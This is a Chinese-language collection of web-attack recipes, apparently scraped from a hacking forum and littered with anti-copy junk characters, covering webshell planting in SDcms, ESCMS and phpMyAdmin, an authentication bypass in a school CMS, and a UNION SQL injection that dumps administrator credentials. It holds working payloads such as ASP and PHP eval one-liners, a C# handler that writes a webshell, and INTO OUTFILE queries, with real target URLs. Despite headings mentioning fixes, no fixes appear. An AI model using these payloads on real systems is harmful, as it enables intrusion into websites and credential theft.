4 k0 v' Y# E+ I: A' O! AUpload a new file:<br>
9 [2 ]) O, A- K! j9 H1 Q5 G: f6 d5 M<input type="file" name="NewFile" size="50"><br>
: X r8 ?0 E* }4 q2 i' W8 J. j6 F<input id="btnUpload" type="submit" value="Upload"># i' G- V4 F7 a$ L
</form>
3 @8 f+ H! a. f ?-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 u4 n) @6 Z& ~
+ h3 R- Z1 L% D$ QSDcms 后台拿webshell
2 _ ?+ q+ R' [0 I, W1 V( l: z+ s& i* O7 J
第一种方法:1 Q6 b6 S! b- G/ p, K( y( F9 m/ E
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
6 _' d/ |( W' Z9 C n把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx! ?0 L, r. [( T: A
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
( f! z$ {8 @2 b; f: }% G5 y; G, S第二种方法:
# r0 K; A# A2 {* H0 X进入后台-->系统管理-->系统设置-->系统设置->上传设置;
, \9 {7 b% A& m& h3 @在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!# O1 H/ y# e+ v) M) N- J
第三种方法:1 p% Z- v# Z$ w m6 p) _
进入后台-->界面管理-->模板文件管理-->创建文件3 o" l6 n; j+ ~- B- ]' s/ G
文件名写入getshell.ashx
: D" ]& [! [, J0 X: m4 w内容写入下面内容:
- R# S3 V- c- ?7 \8 j+ p3 O& B/====================复制下面的=========================/ a% j0 d2 y7 K! R$ k5 ^
<%@ WebHandler Language="C#" Class="Handler" %>8 B& T. l( G' P9 i8 y8 ~
using System;
; s) ]6 _1 ~0 y- J% R v& u7 Susing System.Web;
7 w) e) U: f7 v, l6 L$ N) ^& ^using System.IO;2 H; Q( @ k) |0 m, G3 I
public class Handler : IHttpHandler {
6 ~" a2 e. P& i" vpublic void ProcessRequest (HttpContext context) {+ F! {( q# F. M9 \9 L. e! h; V
context.Response.ContentType = "text/plain";
a3 `& p6 t1 K# hStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));% [6 S9 k. T, W
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
; s; N3 C$ {9 A+ K, r" O4 z! \file1.Flush();
6 ]! g8 b6 T7 i. l: O% `2 ffile1.Close(); A- V% b( M2 R
}
1 L6 H7 j: N$ ?# O* M# u7 Kpublic bool IsReusable {
& y4 @ ?- o& `9 n i+ m+ W- W5 l: Bget {. E& ^4 A* _: n% N
return false;
+ z* _; o# n4 F' i3 N}
* n; V* p8 [: r/ Q+ }}9 N5 \6 _" ^' q6 a9 Z, h
}
7 J7 L' I9 `& ^" E! i" K/=============================================/6 I% F9 K/ N: A& Z
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
- M" s: ^ D4 C- W7 R2 v# s! O2 p会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
) r% o2 w0 `7 i& r# _3 @9 h-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ S8 ^* K2 A. B& p# G' H
; ?! C8 v- u2 p$ \! X( K0 R4 aESCMS网站管理系统0day
' Y+ V @4 O9 _4 B! `6 a# e4 [! o! N' M3 V5 i
后台登陆验证是通过admin/check.asp实现的% U2 m2 \5 S8 H& |' Y( T& H
1 z, ?' Z7 U' R首先我们打开http://target.com/admin/es_index.html
7 E7 I3 F" W5 F然后在COOKIE结尾加上) C* }' [0 H3 }1 M
; ESCMS$_SP2=ES_admin=st0p;' u. |- o' f" i' Y8 r8 ?3 a0 S
修改,然后刷新
8 r% v6 J3 ]1 R: q进后台了嘎..4 K) W' L% S; E
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
5 c7 {6 D6 W5 t/ J, Z3 U" O7 G! _& F5 c
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
4 u+ y% ~- t& J# X$ q v嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
; r" E7 L- j; k( T存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..5 J* J$ F4 m8 U+ R* d4 r( T8 J3 ?
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了 T: y( F, J9 Y2 h+ X) y# V# w$ S1 D: K
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------) L0 s* G! w$ t$ F
' d2 U+ y) {) B2 n" r9 T" h. _- |宁志网站管理系统后台无验证漏洞及修复: m0 _/ _% V2 v
! @+ [+ H8 U) d$ | `# N
网上搜了一下,好像没有发布.如有雷同纯粹巧合!4 W0 O" c6 ]0 I
官方网站:www.ningzhi.net
. c3 L! u- _* H2 ^ H/ x; A学校网站管理系统 V.2011版本
) k& _$ E; G! ?4 n0 y6 jhttp://down.chinaz.com/soft/29943.htm
8 V! H r) D) R2 E/ S9 S其它版本(如:政府版等),自行下载.
; n8 [# F) ^% u1 S' v漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~8 N Z+ s$ `* o0 B1 E$ v- \$ O$ C( D
login.asp代码如下:- w2 j6 b! A& n* g% {/ g5 U7 }
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> . Z: y" w! r& M& A
manage.asp代码我就不帖出来了.反正也没验证.
5 Y2 ^/ b, D9 K9 W, x% ]只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!% j6 C6 o8 T# p9 v% |
漏洞利用:$ `( j7 ^$ e' H0 A5 m
直接访问http://www.0855.tv/admin/manage.asp9 e3 T- o# {+ P: F: y
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5. ^) q( k0 t! y) t, K
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ R% ^& N0 N% s) I8 y1 f9 Z8 v( g8 {9 g9 J
phpmyadmin拿shell的四种方法总结及修复
: }/ m+ K# W* Q' D! I0 w+ d# s( X( K# w7 K( |7 ~0 U
方法一:
1 |6 T5 m+ D K9 N" {CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );, L8 f. H. Q9 `4 H0 M& Q- `
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');6 e. p7 Q$ K' G ?' a
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; Z& \- c) P. `$ g; H
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
, u" t, j* S7 ]( k 一句话连接密码:7on
) I: g7 E4 @# u% Y2 g( B9 i方法二:
! F: s' v* E6 B7 x/ ]4 g% F读取文件内容: select load_file('E:/xamp/www/s.php');7 R) T0 \' n, p( p, e* p: U
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
, w! c7 V* @4 `* {+ B$ c9 M0 }, Bcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php') [- T1 L1 v; P" ]+ s
方法三:
' ^ O0 u& F: y M9 a6 l Y4 RJhackJ版本 PHPmyadmin拿shell# D6 b3 @! s5 z z/ F8 N, A
Create TABLE study (cmd text NOT NULL);+ R5 w! M) H1 V. Q
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');. P3 k# }1 Z) I# t# ?! K+ L3 H' ?- O
select cmd from study into outfile 'E:/wamp/www/7.php';- V3 u- U; A+ G) h
Drop TABLE IF EXISTS study;+ _$ X4 X) u- @6 P1 A* X( V; u( n+ e
<?php eval($_POST[cmd])?>+ e) ^/ K! @ {, E6 i& u
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。& u1 j4 {4 S" h$ c/ R
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1) y6 N- O6 J9 z/ p1 `. _
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
) M% r2 T$ M2 ]0 S5 @0 w, a" Q2 EDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。& _% L- L& e* N# x j
方法四:/ H) U3 N) m" F- w9 w
select load_file('E:/xamp/www/study.php');! J9 W! h* ~* B1 s3 N( t+ O: u, i2 W
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' u7 @1 V) y/ o5 x+ t" l7 C3 z然后访问网站目录:http://www.2cto.com/study.php?cmd=dir: M7 \: D# V$ [! y4 Q/ @
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------4 u% W! U0 Q5 k- S7 d: h1 @
p3 @8 v( Q: L INO.001中学网站管理系统 Build 110628 注入漏洞6 A0 m- n9 ~# {) {% K- X% I
+ p. P7 C: D! @( Z; n$ `. gNO.001中学网站管理系统功能模块:
& u1 t" n: ?& J5 k' l" F5 `1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等! d4 c' ]( _" o- i
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息+ {7 X* O+ p" M; ]9 g1 e
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息1 D2 f9 A& C) r m
4.视频图片管理:一级分类,动态添加视频或者图片等信息& a# \1 T3 W" \ j2 r$ d( I: M
5.留言管理:对留言,修改,删除、回复等管理
3 Q2 ]; @$ Y2 U; I6.校友频道:包括校友资料excel导出、管理等功能
, Z; C# {3 J [9 b" f7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
% j) n! G/ ^2 j8 Y4 b2 T: A默认后台:admin/login.asp$ }! `' _ N9 N) @# w
官方演示:http://demo.001cms.net" A+ z, j0 F. Q: I; s
源码下载地址:http://down.chinaz.com/soft/30187.htm
$ }, K2 B7 d, i; C. QEXP:
+ O7 n# @# K2 e! yunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin: N8 S3 @% ]4 E8 L: \: \! U
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
( Z5 R# R) o$ j/ pgetshell:后台有备份,你懂的
8 {. X7 j: W" G* C& [. P% g另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
6 P- h" W1 x3 N: d$ {, A/ J------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |